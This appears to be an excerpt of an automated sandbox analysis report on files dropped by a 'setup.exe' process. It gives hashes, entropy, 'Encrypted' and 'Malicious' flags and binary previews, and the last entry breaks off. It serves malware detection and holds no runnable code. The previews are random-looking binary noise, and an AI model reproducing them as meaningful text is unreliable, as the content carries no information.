              SHA-512:CA3B600E3F07F14A3CB29A800048483ED2BEF7A34858AD85FE70BCF0F28DBE958016E056FD8A2F324448C4F63C42FD5EAE887E38D9EDEA4461453772385454B4
              Malicious:true
              Preview:[{"Sy..b..P..AK....6....a.P?....j.82.W.d..a<\-.i..G.....|Gjr. T!...NC.ZAzEI.......}{`.%.xq..o+./...c...V...Z..p.H.,...<.......1....M&..-F.L.9.x..'.......<.6..=...%R.&..$..n.9..V.|.6...?."..s.5(..xF.w;r.)f..._s..y..].W??...Ng..*......L....S..C..^...3.8...O......GcT./..Q....N..8.....a.7+"..........b-.....".R.Tar.e...........l.:D.w0......"R.[..Q,<.....=t%...v.4^..L."Hu!..8).3X..2.q.....:..OaV......A.d._..J.7...=..D2..(P....S.* .m8....so....]P....rA.k.oK.E.O3...A.l%......T..;#.z./K....?..w.B.s.._../...^..n...-..5{......>...JIj..@)X....|3..K.mw0.|..2p...]..=....p.HC.$.~M...Gi..u[!.S.x@2M....".Y ...@...c..'....S..7......]....i.+.@....."..N.iD.K%.....)...I..t.l........r'{..#......\...|..(X..m.%..w..~`..5.l8...h.m..M..p.}A8C@.X.Z..Z._...'.s.uT.L.V..$."...{.l......$ ...R........[Y.....L...V.o>pOuX..............h.<.Y`o....B..rg~^.].&5....c.....'O.!E...O:D..L..'.yMu.<K..)._T>....+.n.../7.W..'X...=...{.....d..[L=xR.B.7|N.Vj.G^..h..3...o{.h.4..A...o..1.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):115168
              Entropy (8bit):7.998315745392371
              Encrypted:true
              SSDEEP:3072:BFduLM8uG9+wOFUEspV1JAGf9V5fUJNAMA6:BLH8u4+wOFUE8vTQAn6
              MD5:08CF29A236268E5E2021A0443C224CFF
              SHA1:6D013394A2A4DEDD44AF5B04EC9EFF936AA74794
              SHA-256:4FDBC71B6513D67FD6241EBDF087EFCAB3749F00838FAF4D542D2C9AF1DF43C3
              SHA-512:9E93A67D637ED406EFA766816E19307CBD90CB0E63D82AF7FC0F3F7366870970E0872604EA86E227592C35032224C6E97393D63ED424A38A849D2536E35A51B5
              Malicious:true
              Preview:[{"Sy.^/.V.j.A...y.D/..)@...P....my.0P..;..V...m...$?..$.UIF>&.b[`.?..da.:..9.....~...m... R.7G.7...V.(......|.q.)....H(*......b.\.../.....qp.^0.@OI[...7<5M....*...<.B.K.!.[.OG...w...R....;.}.......;.%*.O....../.X...0...eg......c.Q.I...@.N.M(.r.........[.:s-`Bl.#..;..V..^...di.Tj.....#F)=.n>..%..U.}.%\..K.~x..Q....,.....2.|V....AzC#...=1*....q..R.I..L..2....O./..rX.6z.....'.3.,9.U..k..X...N.w.3.....c....3!.....R,.x:P*..,.+..;..R.eTo.z.Z...3s.....4"...Gm.....W..o...].../..b<oxa..~..&p..7;......LZZM.....W5AV.t.#..*d'...R....}..J...>..K^>D#..%....k.f..`z*M....y.g...N.@i.N.".?.f..>Em....{.KM.%W.r5.,#{..........p..8..o..X.q{....P........9..5/.Y...L.x9&r.X`.......Q(....J...=.S...6..=..:...{H...,...3....HO[^..9..SWvk.%lPb..R...b.M.hg... 5.....4....W..+..8..H.[.....'....NT..E..... hG...7.@)..........x...#.K{...YMGN..$i..].G.\......6#...B..5qs..;B..J..Hp....+.i..X.7n..........z.k7.d%..W%..Gf..o......&..Z.."2.q..^.....0T....ef....Hk.v~.6....=;t......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):115168
              Entropy (8bit):7.998350150394412
              Encrypted:true
              SSDEEP:3072:ucyVVQGwJZZWMzlubqfLS4TJtpcyI394JcEoMTo1tYEpz+:OVyZZFzlu8LVTP/U9jE/GtXpK
              MD5:89369DC9E4323C768D4196CBD5B631AB
              SHA1:EB50D78E9B2A3F4A26AA649E5AF439066EFCB694
              SHA-256:3C477EC02C03D444C18F729654AE7DC25719DC10D4C91C34090DF5C058E4E4DB
              SHA-512:089441FDD39BEBDE48BEB2428EF3731218AB5699ABE8ECFD3D9CE208BDCFD536236AFB7FC938A7BC68025D27014D95019A6C6D77D3E3B625EA1D7536817FE691
              Malicious:true
              Preview:[{"Sy.u.....F.....&T#...#......c.s...7K2..;..4.p..+/D.i.O_..[..../............P~.. x..;..5..M..#s.......eQ..If6.b.}..h0......$.]I@..;G.]..0.S......}6+..(....X.=.%RG..*.OT.o.*..!....<.......NV&.;v.9...=.GP.....K.7..`.B..9.O..#..Ap.9..v. b..R.o.a>v....../..r.q.pXe..b..7....K..@X..........8*iL..Z.v^H...**...Y...*.....^....X........q11.P,...EF.v.i...2._....D.}.^`%....53.O.:(...,8w.....P......h.C|.....S%V .....r....lFC$..m......>|H.....O..!..x.|.}[r).. ..$...*f.E..l..vE.Zd.u..E...DD.(.......M....[Z..+@.X...#Sl..t.v.M..x.@P.M.Q.Hh....*.g/....s.yu......P.5...{.U.).8.....>F\.....q.z.h.Z..p.j.N.......@...c."..].....J......8j)fS..F41..m"/..V.....{./[......G.......a.?.-v.....4..h.!.k.....%.K.X.4)....s..@....m....A.#.'...c.y.5.3...'.#..t.(..J.C.r&.d.[td.n. ^..f.Y.n...d... .vn...-.so.h....\....>..4!.v.C.<..Y.G.b.,.....>6.0-../&...4..W...b."^.R.....W.M.w..."mp._../X..X.....'.L.Cq.h)t.{U......o.......jK(.).zr.Bs...x.`.._.*...)......<.T..W. .^..A.?.]0.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):114325
              Entropy (8bit):7.99845267738158
              Encrypted:true
              SSDEEP:3072:MNCEe6sIS5jXRklQr5j2MO7dJcXMgwstlk0JuufTjt8+/r1LFa5H8:MgEe35jMQtyJgdtlNuCTjt8+/hJC8
              MD5:52AB90C6D6B84A0EA6B63BC2B3CB7BEA
              SHA1:515A72F7FCAC3A738C5B55FBE10784A0D94EA997
              SHA-256:77413E50980DBE07B410123D0680679A14A1EC0105B0E746493D42F86249763A
              SHA-512:D98CC4B9E0B4CC649011AB420B85B0D0D156760E576983438C2390B10B1AC4EA8A6EE3B55261680AFB67E11C8D0CD807C8189A3346C22E6108A7C8EF51FE0481
              Malicious:true
              Preview:[{"Sy./s.Ut.,.a...a8..01.L.&...0.|C..PLl=7U._.0|.Y...y...\q2...HE.kBwt;..k.(/.5......I..|.-v%.\.q. W.....f%Q. ..j8..T|.6..!c..j.M.bAJ?..`....@(......P..]e..T3..FJ+..7 odF.....\.fS.H."._..7.&.r........E\.iI...u..2..E...u.S...+}.j.-.Nk..VE....gq./......m^..HN..A.)g.....Z|..M#.[QQq..-.u.[ .\...k...Q..b.............YV....C3+.4w.>.Z..P.L....`...BZ:.....&>,..U?`...I.b|H..D/.......=OU\?RFMAz..n..6.J.s.2.T....,...Q..J.... Q..#A......;....S0.\.'..W...1>l_........x..p......W2..a.-.mBCL.\..m.t.Z&.j..0x.2....X......!|.....Y.f..#.fZ.S.......*.q......hl....X.@..5.(f.B...%...nn/.e....C......n.C..C...V.v....|.J)r......A.g.Z..~f.mE>.l..Fj..7^./.).e.O-...V....g...k/.fEl.qJ...OK.d......lk..KO.0..O..tg.UZ...A...z......q.#.....5).....bK.3..../...hwG...;....v[...S.GD..i0...$.D..3:.D...cA.X.......).G........`...GY........r.!J.O.vi..K..6....3.u(...T...d.v.G....1.......FR.`.>.".T...t4......l.r#,.......4. ..r.hACZo^8`.=.|*.....+......Z...SC....c.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):114325
              Entropy (8bit):7.998526925650396
              Encrypted:true
              SSDEEP:3072:M4Tflm7JB6Y7Ll9U2XC9S8OMRI+hN5KF2toFP6ZSCyWbPceY:rlmlBlV9pCw8OA75Jt5TPcp
              MD5:E40DE1DC2586EF1C0CD0428F8482986F
              SHA1:46C65DB8187FF9644AFD7841C6DB46F9D46DC7B7
              SHA-256:EEBDCA140626F3C10567EE6574EEF017A1BFD0556C7130FE81C49D1168C9F5D9
              SHA-512:B4A6ABBBEE1445C1419C7793507640DF5E29B01D367891CB6C87B8F34305AC3D01E6AB901784B1FE3489E82B65D189E936BC9607F82943B90C82976E7F7F2C5C
              Malicious:true
              Preview:[{"Sy..j..c....b.v(<`V...s.\8h..'..j#...4......b..JN.u.u..O@.*M-..x..[1../..6..|q..d'..w cZ.>Lg...{[\e....&.e.%...O..=<mM..!..@.=-.~8A.v.I.*.._....L..L[.}.S1.'.T....,.h{&..r..|..,R..^.f.#..BG.......w.....]v...m...Z..8.GVf.x'F.y..vb.c....*@...=..../z..Y/;d...<..e.b.....V..n.Ef.d.b.9.....)...^."v..CI.>...._..5...}...p.7....;.3w....j..31.C5..X`..(....[.r.N....M+...... ....jr<Et.DV.D...f|_.....9(.y.[o..N........y;HL.'u...P..Mg1.`....i.....&..*S...W...HgE...S.9..1!.?._9x....@.}.&....b. .....u.M..;..k6.&s4r.X"x0R..X.k..i..sv4..nM.*..Y:...y-.`?a.>.....V\..#....%.z...H.sY..f...,.v...\T.Uyqt.f..LoND....B..).;...q...J........=.X..n..&.{'6=.p4K.iy.R....~.'Tn.>.....U.$q..m.9....s.Hp.j.U<).K{....g..D..........T.&.*R .....]..N...Z.IE8.a.K.gf.Z.q.&(..0.q....V.-h........_...H.^4:....J....\g..=.@..7F.........>.7l..8Di.".Zk\r6.^l.n66.3:.5.}...d.T.#..4..Yy..d.;zPm.wF.5. ..X8>..(.I.i@..........gG=.<......z.q....%....K>.........y...h;(..{.NMM.!...Oc..$.._~Y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):696930
              Entropy (8bit):6.208445414772634
              Encrypted:false
              SSDEEP:6144:2K+vls5cEu06VGIw+o41DKLJTKiAHv5vWotdxls+FkuMOCc5MpzgroTDL77Kecg0:210u0qwXRoGotdYuMOCc5MpzgroTDLgB
              MD5:A57BF2B797C94D8663E19C51DF974B58
              SHA1:41C6352E062FF0DE7D37C9CA92C4B5472FBC6459
              SHA-256:F5EF2ECD0CFD0469CC315EFEE9720ABDA0EEDB6F75FA2389F76F03D13ECB63CE
              SHA-512:169CC9677904BBA3B9DBEFBF3D85AFD1CF30E2B8AC2B837776FB332FA67E455BA075DEEFC889A735E0B0635AB99882AD32BF5359D7DD760E458B96FCCB6AEB21
              Malicious:true
              Preview:[{"Sy...D=......N./..ZI..u.R?..Ick..}....{.4...B..U~/D".O}.?.R...P>d_.......%....L..9....[ge...o...-.ir`jh...../.~.EA/..$..m.g..4....S..T.2......d.N&NK#!.L..9.C.@d.lYALt."B.a:2R@.P...P*..U@...i..p./W...Fm.4$..P.Xr..R9...v ..>......^tq.w K..:7.o.x.W....mb..rFo....Z....@.F8..A._+tQ....hr....M.?HN.k.UZ..........:.w.._......M.>..GY0...C?.p..w............U....!.....X.....T.3@...v-{q..8.L"..Y..N.|....(VG\........\..X.L@/...A.2.yk.@$../U.?rSS2.*.....b..>..6.v.......}2k.n.............(...w.".z....iPb...]...Z..N..R4.............R.........,.,....d#.Lk{E.`.7[.8S&..)....O...J.[..a...1.f....g....~.;....|..C.T.Jea..g..21G.oTF...i.a.uC.&..\J.1..<........7x#.w.0..9............?.6F..-#f.............7..6.....po....b=_4.K.w&q.I.r-..........Y......T..W.m\Dl....9....q7:q.....8..U......~..;Grl..d.{C...N..j..s.5.Pf-S..=.....V.}....b...6.o..:emD...Y8%q....].s..k}.E..........:.O%.T.o$>.....H....?L$v.2......h.............C.W..6.M:v........Cj\T..~.,M..+.b.5.m.Z...I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):28781
              Entropy (8bit):7.992643348782188
              Encrypted:true
              SSDEEP:768:NR1j+ZI+p6fSycKMnij5nCfGF9rsOs++XnIBF:H1gNfJfGFGOs+OMF
              MD5:50B7847F2E3212C0464049711B3A3139
              SHA1:C97ED5964A35E9D05488A2E421CF7A9451A859F8
              SHA-256:29B3D1D94A1B9D0F0AF63083CFB8C6BE46DF7FDA3477DA8FB25ADFEA1FAED9D2
              SHA-512:4F66D4F4F27BD8DAB75983BF004493FD71C438BB1D3866E9CE3CF0B0F34BCBFE1BD561350C790867112365A491C2198D34AEB6A1BBCE2D55BD5D9473063BFC4A
              Malicious:true
              Preview:<svg .J......!.C`....y.Z.Z...j..qM.....r.......=..,.|g$Sv{.......?F9iuN....I......Y...Th..v.\m..V.;:k.y..W....O.x..[...NP..i\PQ+.2.-e.z0.0sS..o.P..n...[I.HN.-.+u......@.......o.Q0.....Kd4:. ..1.E".a_..W...O..%.Y...{...O.N.~.d...."?*.6j.."...n..0_.3...X...[...7K6....S.....6_9..oNkr.P!.E.C'24..).0..Z.5.......zS...p....[.../......-.........ar.l..a.h;"..q.ZK[.<D...'Z..]..!..A9._..]...]..+.p..j>..{.....%L#..m}[....]....X...W..;`.eDU...{'5D.K...DQi...c.Ll.^...m...A..EYyf.6..b...Z.?.;.y:..q.}y@.....R....t.Uy"..$q$8..R.....F%...B.....Z.t..^|....V.?._J.#9..4.......S...d....a.$>.+..3....Z.\......J.Bg.k..A.z....m[.X..X...!..xz..Z.....<k.j.p.H........H......}rjaN.TU.X..0..KD......w...c....O,......Q.V..-}K.u....!.............5..F.X...j.Z....n.b.&,..J{k@....\......e.n.d.....G...hr.b..Snp".x<....9#......c...dB.Q..7.....&.|.A6.1........ICd.@...O......DG..j.>..G..6u.k.H...:....2..A..lR...BP6..ll.M.)....%.....1../g.ST..#.;k.i.R...}e..{hZ.V.f.j..*..}.Y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):28813
              Entropy (8bit):7.993686623330096
              Encrypted:true
              SSDEEP:384:sZwp0zeF/U1ra8N2xNp55nu2RaZA4jQzta3QBOoyO0SEakWnvz/Pyjodtx8Ffq4I:swpnF/EEb5nF5BGO0SVzyjmKfq4I
              MD5:291600B89253E53E89D6222C72073586
              SHA1:F3106A172197387AA4A47B773150CE3AF4EDD443
              SHA-256:83F5C5085594D7D2043DF55D5E4DF3433D9870EC4A0D1B2806E82D8B0C6A8B28
              SHA-512:8063444E93CC4F182D852BBD4637A7E970729B3FFC9AEA803F10CCDF323AA4F190CEC8AC099311B3592B1640F67FFE72619A4DF6F6D1782BB4CAB6AC16D7A686
              Malicious:true
              Preview:<svg . &al..(.d.!..Z8.1`. .....CS8.n......!.|...1O....fN..S..r..o......d.......w..9.'.8...n...6A4o`s..!m..\.3.][w.e....F.S.#.+.>.<..TU...L3.#.w. .T.m.M..vCD^...t.F..,...g.:...7.5.....w..JD8...Q..{.._...>_j90......t..\.F}...z.M#.>.p...?.>..V....4.....@t....!0.e>0....Y./.LP.ZgI.Z...a.!~........u...&...\.zo.W...8.-.e.....I.,e.$...T:....\.e.....o.*.D...q.$..l..j..[<,.c..,.pE.>..[.pK.q.C&....."Mb....@7..M..M........_i|).S:i.9..Qq...l....#.Y.....uK.J=0.cp..$.(.....e..?.....>.1.ml.............*_..0e...A82.5:......T.L...l2..$....I=V..7..o.A.......Jo.k.....T.4.>.! .....|...z.`........ s.(6.z..G...W[....3.3.[8.P....D...3.-6g...../'\.."1B..lq.(.n1A@>..[...A.=w...w......5.`[....M.^Q.......!..%K-....C.....0"....n.!`.^..!l.O..F..p.{`A...HyuE....d...C.zmm.0.......;". a.~..5u..'%....[.GC.T..K.l...U..\.b.....6S..O..gy{{)`..1Y..#$q4...-...V..........x@.w....>()..r%.k.8..x...1._.O..YAU..x.)......z~.wV.....b[.l...B.m%C....t5...\...j.b....Z.M..3X%...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):126862
              Entropy (8bit):7.998421245276035
              Encrypted:true
              SSDEEP:3072:RjlPDAfmbrKKt4lcENrIERzgkdt1VyDvUjmtqOMr:HrImbuKOjIIzg8t1VQMqtqOMr
              MD5:B656378CC3BC6F46A671C38E477517DF
              SHA1:DD597C0FDEF394EA4F5460F44D3FD9D4B758011C
              SHA-256:FD457EB085BF54298D383D267A869E76A3F707C46958F427D8EFA22268034BDB
              SHA-512:E53E6FFFE0E01A2AD79478C94D9524BC92794E3B842A5C65D0289880F80FA8B4BCC69C24EBD40DAA5DF0F23EB2135C95AF46519244198E00F5FD8B03DD7C46DF
              Malicious:true
              Preview:{"loc..3#....P%I!.7.....g.\.Ot....,$.A4.E .6.....)wc.m...[c.Z..].8.T.......Z...>?.^c.YjE...........fn.~.M...6..@..\q.....1...e........2vI{.R..;.W..I.^jA.d...#i.R.-R-;d!.5YC.SM&...4..T..`0#.n.gh.G..!...".'....E."..i.Db....Q...;..#..<.n.t.._...6..I.....m0@..a.[..s...*.1.b..Y....w.c..-..j"......5...y.X..Ue..$<?......\.Q.~r.&....r..Ij..G..Y5.'..'...Jb....;B...._..U..."....^.Hgl..1Z.v..\!....9j...Wa.. ....w.. .^.a../W>u_...d|J... S.......[..7..A!.i?a&s014.z...E.\..K=.....[..`0......E<8..)7.^.O..$3..D...[&..Z$.......4..6..2/jJ...L.MH...@...."..|.5.|. l......../..p.......^..u.|y....1.r...'9Q9..e...1..5.&.(~.<....I..=.;.n...+......8M"..J./.9.x...)..G...(.a..4z.....s.......*V.N..$.H....r.4...@._..0.q.Rz1...]..+.9.w..N.54.R.P.......f.1....o.H............9l...z.+x.k..e.%@...'$g...@....n.R..fFO.B#$n..V...Hv<v.K..2......:w....!..V<.pD.......|.Te.<P..U...[.x..Z!+..^[.r.k.......3.4r./W.~...P1giQ..._..J3.y..w..J|U=J....n.J..L.c.K.LQ8..Z....@...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977653420496995
              Encrypted:false
              SSDEEP:192:Wy7jmBz7HlmmARxMsKs8+OQcRQwKME1IFqAx72M:WJBPHlm5lOBOMPBUM
              MD5:4907DD4C1019692EE5B128810F4C6812
              SHA1:71D3DB5C690E21DABC7DD0BD6F1B56732FF6E468
              SHA-256:9907E77F7540F0D48034D16AC886DBA9FC0B9BCFA790846B4D09DD158BE15079
              SHA-512:45D37804828F81BBF504328DD4E33D92ED935E01F494949C2298BC9CD2BE357645C771F5DC2BB5A08E5E0A352EB9C11877E91AAD0847D6D0AD96E5BECDAC58E8
              Malicious:false
              Preview:regf.%Sw..S.y.....d.o..c..PX..7.. t[gI:G..R..Z...p.B.V.B.P.....6s5..b.B......F.._.o....Z.[C.T4\......@.k.BK...&.L~....B.K.[rd2..Hh.0v.Aw......d.......Sm.,e.......{.F..6.s.X_.@.Z.VxK...dL.t..#....+...sS...|....K.V......@s.,.T.z.<...b.;..Z...b@.Tf.-.....Q.5D9........DfU.s..R....."m.V..w.$.m.Y.p......{^.h..n*.1...,y .[.e.'..k..~....I.......n..}.v.>3......&<9....U.gD.....U...L..iCRro............k.....o".M..+a..^.....X.?#...e..d......wY.rH..C]k.x7.;#..;........(..WW).....w.m..:.2..hd-.b e..A..ZV.oHF3a.i..A.`..'...............p.^..WSB..`k..z5}X.."v`..G..x...&...u.*....M...!.....T..qC......e...W..&....I..3..u..9.W4...&.m..s>;{.~qi.4...!|......z..."}_.............<A...<c`..>......m.i..._V@.;>.!..w....1.......@V0y42.{L....M).!D..p.<.?...k.n.7Y.-.2.......&b..Q.._Q(^...C...|....T_.q...+...6V...g.n..EH....h....c..K(}..<..Z. ...".....N.....K.?.8.2...&..'..f.?....L..)o..-9A*4./X@r!.............aV.D5..%z..Pn....N`.4.......{...Sk3o.<..k..........@i.j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9795413843960326
              Encrypted:false
              SSDEEP:192:sdjH0FH1Z5zNXgQassZVV3qS/vbyyed1z1yHwO+9DfK2:sl0VZ5NBszV6S/vbI51hO+9Di2
              MD5:EBE09129100A0FF3B7050DF683FACEEA
              SHA1:04552E06B64A3CE270D13F19206E6A7CAE261209
              SHA-256:91681EB26C8045F1EFE5D1A4B10DA378EB0914C737DFB4118CF4342594783C08
              SHA-512:3B6F8AF13426447442E4EC88518F4980F38CC2B60C861AA4D48B9DD1807C556438C62CBA1FFF702B1D5D74ED6996DB2D3507CEE16D374EB5A89EFE9CC3272942
              Malicious:false
              Preview:regf..*@..>...Z...v..9..c........Kc......>...7.....C.?P..<..p...L.\...#.....rU...Q......Fr.PUR....n............E.....sbZ..%...*..w0N`7[<TiUY{..r.."t:...M.I....d.....r.F.mc2.....{..&......4..=.-.....j..8.W.7t.<.S.#........v.jR.Q.Bk..."o.\..^.....rp..(1.I.gv'........=.n.+<...I#......3.......~...(.....QV..g.....,.#..yB.H.....(Q..Q.......e.MI i.]\...P...o.Rp...eD.y..9>...F;.(..G.~X...VxC.l...:..F.H,QG...*]...z4.N.....r..7.....^...t...fVi.WE..Fi[RW.....D..h...G.....\....m.$..*..]...;........n......+...6.0$#&.FX.ADc..../.j>v.N\.S...1e%0..r..}.=....W.%.....y.H....A..C.4wMW|.X..{...X..^3.."d...}..-E.<YCy. }.R.f......5.e..4....`.7......j`.k.L.q/5N.....(`q....c=jV..#...S.,..f..:]....|..mry.QQ...H[..k|\.....&..~...uh.p.[.. m*nB-.9....P.l...QU.(nx..p;t1+....~..#LZ ...x...-..U.,/..f..*.hj%...]M,.k.1..6..X.._..%He..thc.b.....s.0/l3[.k..tI....r3.....I..M;yF.%G...Fb.ocC...cy.KK.p{a{x......X.x..X.bs.2.f2...,0}...z..p..;.c.^TO..g.u.-...._.l......bK.....*.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977554609312237
              Encrypted:false
              SSDEEP:192:esb5Pd1BilMoN4BHnq/b8cp2nn5+iImDzgTGLrqpwEMqHa0cZo:eUpidan4AQw508GG/McxpZo
              MD5:A81D81DF98AC463FE9C7B2A434E02153
              SHA1:E5B6F79FCF3EA90777EDD064F6506EC88C430C4F
              SHA-256:60E0B7E06A8C33A3897074821D8B15FA410FE67F843B3448DC1D3682363A62C4
              SHA-512:A440312C2F7E4FB68AC3E42CF5062FBD6B9E16B19C375A3D8A55DC82AE8326EC3D0B037515E83D64595C0369A0F361C14F0B7EEA74B8F724402B1DCB0756CF4D
              Malicious:false
              Preview:regf..l......:.%...;.D.iO[h....9...k...$a....B..U......8.l."..].A.b....ZvW.<.L..\y.C.,.vG=...^.S...v].K&...O..V=..a.wz.Ao|n_a....2(...g.....W.c7N....x6..*..C.tx[..~..e.Q....._....u.YH9.G.@....2'...B*C..r....3.Z(...j........lb...b&......(=.v1 ..2R..kH/.B...~..s.WAr.>.....p,.x.;;G..,..4.../O..G*.G.:...a.m..~.h..L..........9o. Alc...b..y.....O.....L.ju..... .?.s0..@T...i......s...7..c8nk.U..P...z..R.....>2.q.LJ..I..".w..\G.....r...jL......b....j.+......&.?.`...B..-..ie.z.....".9.$.9L...J8..>.....V..=}.X]b......$l....!.........-......G._@..*.W..e.v./.....q=......R..C........t^X..P......=.V.0.....o1...3..@]zr.c6..M...\.z*.YL+....z.JYo.X.T?.......f.m|$.ky..r.H.1....8.8.n.:...$+].i.........G0<..$h..[.].G.w..?N..b)..A(l.Y....2..]y~h...7.5_..a..$v.....3".8E.{.R.0.U1.....N.>T8.D(..*..+L..7..8i.6..q....v.i......./oS.......<....\8u.....Y.K!.&P.....m.^#|8..1....]...N..QV...........^\....).}.....!....O).V./y...;...C.2.P...m...u.n X`...kt...b.yA5
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8547662
              Entropy (8bit):5.205039112009478
              Encrypted:false
              SSDEEP:49152:3HK38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOC:sF1qd/LKNC
              MD5:8E198635F273DA54787E6DD759EF6037
              SHA1:8F671B33D6C34CCF0307DA5B838C0F5116D862DC
              SHA-256:4DB4E4B32110BB79BE2DF6CD365CF82DCB75E5C4F64ADA220930DD09960512C9
              SHA-512:CFEDA3D73DCF613C4D0F80E2550A9380D9FCAE0459ADC4B5FE4B800CC33F0E8CE14DD7366175E953AA91E7CF8DD37E3C267DF8FCD5F7D5B339F88D39074E69BD
              Malicious:false
              Preview:Micro..S......)...5f..m..e-7.npr:...8...a/..'..4c.4...cW....}..*[.o+"d....,...S5..2-.A_..d..v#^l_......C..t..]....1...............4..1.;.j...... .%.....G/Vq.#:...=F..!h.'t...#...a......P.@q.'.vceY.I.h@.pd......SrY...`.....1'...?..U.....I..F....Ky..a.K...N..]..1.V.`Z........h..rG.!Ul..j A...w.WQL.f./&.q^..F.X....v_.5.... .....0Z..X.#.\.V..1H.XZ.<..W...G:o(...'.>6..>kiw..I.c..o.c....kX.O.-..t...B.`.6.l.9.W..{=h.hJ.T...,..S...A[eV.R.2.....49.@.`....H{...y|.%l...M9Z.1..U..]..A...K.%0..'....]..=...N^6~...<.8'&.N.#..0...NU.M..5B.KS;t7G.....~....8.~&S[LB.>I.j9M...0..&....|.[..6!..Xnq+.h..........N~.?.Ev.c.....>..P.Y.3Y$...q....Px.m6..^...:..R....U.4.3}..A1}..#..RB..,..{..cx*..-..N..........w.#(.g......TN?9.......j.'q...iyZ.}.7........o.u..C...p..O...DV.j.^P.......~.~E....+.....;...ab.\..>..r."....-h....D..J..D..v.(TA9...f.<... ...t.3...X.\....nk...6.p...c.....+(..l....*{.;!1.t.r..f-3.......N..F$....$^.._.....5.t.x.g..f...A.....b..#Gz.I.{.Lf........*..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8547662
              Entropy (8bit):5.2049134055601485
              Encrypted:false
              SSDEEP:49152:wRQX38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOs:73F1qd/LKNs
              MD5:5B0F870502CD76C3CD8CB8D4939D6C9E
              SHA1:117A4B29B28A1203371AFE7831D1AE9C35BDA37F
              SHA-256:0C9EBD52D133CA8C98204569564B4DD4727E53A569393F27112707488CE83199
              SHA-512:1B6BAA41427E4CAFB6BB2B3FFF5BE378C60494CE4B10039B1E1A9FCA03F24D30157D204E37F595438254C3DBEB62CE715FBE2BFB412334D455F9B5743BBD10CC
              Malicious:false
              Preview:Micro$?.C,...cn.7....[..]...vP........K.i..bt..7..@....JB..r.X.2.n.....X..{.:..=.Q...Q.._..s..T.'...).G..L-.k......p...#..O.......6....(...IU...R..v9......p,.P......Y....E....(.....+_...r.....C...S..J..<skR.......3.e.<.g{...SU.....J.`4..IPd...2eI.F)...e...p].OAv...H.u.b....-.....Q..S....W..s.F...........xT.%."....`A.@.....)u..0.....;(<7...C.Ql...3EA../.E.{.q.9....T.]v<8..C.....ty.G....h.K+...B.`..e.X0.U+.Atoa..S.n..:..S.........wD.y...@...Z.~.&..Y.U.%pk.}3....@....Q.sd...<.U.JC..Q.C...= ....Fk.Wr3...\[(]z.5E..;-.j-...pWR.Azs.c...|&zL....@.8x.........L.:.8..h.....g3..dW#...........~..,.9c.o.;S...2%.2.A...G...]A...SdZN.d..*..~+.....~.>M.~y+Dn.....6>.7....q@....X.oY.6j..-Kj.(b...F..4...j.&.b...z.7+..\..r...s.....A0&...T}.v.N}.R..@...i."..go>..;/.e.~..e..22.._.)........_y"OCYE.......)...d.......{.uw..l. |...>W..{.|..\..w...E.[U...3......j5.,..x+G..{~X..D.A`X.`.G....m.m....N...8.k.....Rp..O....^\.4u8...qQ.V..0Q.x.3..b......\g.M.-..K..g;..x..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1192270
              Entropy (8bit):5.6637474246464965
              Encrypted:false
              SSDEEP:12288:wuc8cO+AJQ4aKVmaS4aMz8Pg3lxJo2cvXt9:wucfO+ABaKVzaYcAqt9
              MD5:A85B446C9913340521C00517BE59080B
              SHA1:C162554F4054FC3881D8622FEED3DBFB60C699EA
              SHA-256:68E9CEFF41105AE89B1AFC724CC3972C12850446472EDEA802FECEDFA5190E69
              SHA-512:70D871133CC1724BA5E6A07E9D081469F569B58509F7F74A900F7F22E21287AF2703BBAB6548E1581350578D098722C2EC9BB801FD50349C34313B246C215E2B
              Malicious:false
              Preview:MicroT.....[....Y+..f.X.iN......".].7....+..%b...a.lu.f.x..j..h..q..u..xU..x...-4..B.........H.z..-..'...4..lp~.N....JK.u..J\sp.5A*...i..H.vc-.~.F.Jv......"4s..6...8..........)...7....(..<..........U....T..K.7.0....rI.8.`".............*..J._4T...0..w."77l..8C.d..5...oJ.....Y.z......!...IC..<.9A.$.._.{e.pgu..Z...S.....4..F..3....L.....r$.F.......O^...\.,<-.d.[..^...h}U.e.....S.#...h..y..c.<.E........T.3En;...>..2.YR...9..Aa...6.2....l...L..,..Pp.~...%..8.>..cz..{..Y).....lE....3\.R.d..[._..l[WHvh.....Fu.nA...S.iJ..IH.......B.|....Z..X.l.....z...sy3.J.z...L.7.*.YO..&5...~.g.IV.;...eK.....iNb...h{.\.2.d..-J...J.D..).P.A@.'.Mms.D....1.[4F....~Ct.Wc.W....a.J3...>....,..Iz ._:78.Tp..d)..k]3R.P...a(.....9.w-...:.k7..=...-........j.18......(.d....Z.n.:A.......]...........pd.I..'.....j..#{..E&..X:.q.aZ.1.~.8......m&/T*..m:..*U.i)k.... .r.B...)w..C...<~...H...q.).jad...)z.Xms=.P...../.A9|6...%.8:{o..R.i.g....C...Eq.....S..L.p..NI../b.sF..u.G.|.._.b:.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1192270
              Entropy (8bit):5.663371639312015
              Encrypted:false
